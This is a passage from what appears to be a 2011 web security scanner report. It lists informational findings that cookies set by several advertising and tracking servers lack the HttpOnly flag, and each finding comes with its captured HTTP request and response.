Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 26

No link for security/eset

14.14. http://2byto.com/bluepixel/cnt-gif1x1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bluepixel/cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303648022

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:24 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Pragma: no-cache
Cache-control: no-cache
Content-Length: 43
Content-Type: image/gif
Set-Cookie: cnsuser_id=-621612133; expires=Tue, 24-Apr-2012 22:59:59 GMT; path=/

GIF89a.............!.......,...........D..;

14.15. http://2byto.com/bluepixel/cnt-gif1x1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bluepixel/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:40:38 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Location: ./cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page
Content-Length: 31
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Set-Cookie: cnscc=1303648838; expires=Tue, 24-Apr-2012 22:59:59 GMT; path=/

<html><body>Moved</body></html>

14.16. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4062
Date: Sun, 24 Apr 2011 12:29:24 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...

14.17. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUSEtGmJ_d6tEMmF6Ld72CP1yPoOsDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAF6CFI

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUelvbcSQnrAxyasYlpB02IBM3QRUDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpDNiNPOOpNlQHkG380ZDAwcQIfsZAQqZgi8xcgEpBgMwDwFMzC1tAAsyJLJyAqUYwlhYmVkAzLkdzEysIHdX2eyAmQWAwMAIV8oiw--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:31:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Length: 0
Date: Sun, 24 Apr 2011 12:31:25 GMT


14.18. http://ad.doubleclick.net/adj/inet.hostcat/_default

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/inet.hostcat/_default

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/inet.hostcat/_default;sz=300x250;ord=9266033005085678? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 343
Set-Cookie: id=c4d9990360000f2||t=1303646982|et=730|cs=mtzrl3ts; path=/; domain=.doubleclick.net; expires=Tue, 23 Apr 2013 12:09:42 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:09:42 GMT
Expires: Sun, 24 Apr 2011 12:09:42 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/j;233907841;0-0;0;20874861;4307-300/250;22858237/22876120/1;;~sscs=%3fhttp://hostvoice.com/affordable-budget-
...[SNIP]...

14.19. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1021183&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!!v!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!w!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!#<wb)?!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1033198129/?label=ddVgCJ3Y4wEQsbTV7AM&guid=ON&script=0
Cache-Control: no-store
Last-Modified: Sun, 24 Apr 2011 03:08:32 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.20. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:42 GMT


14.21. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
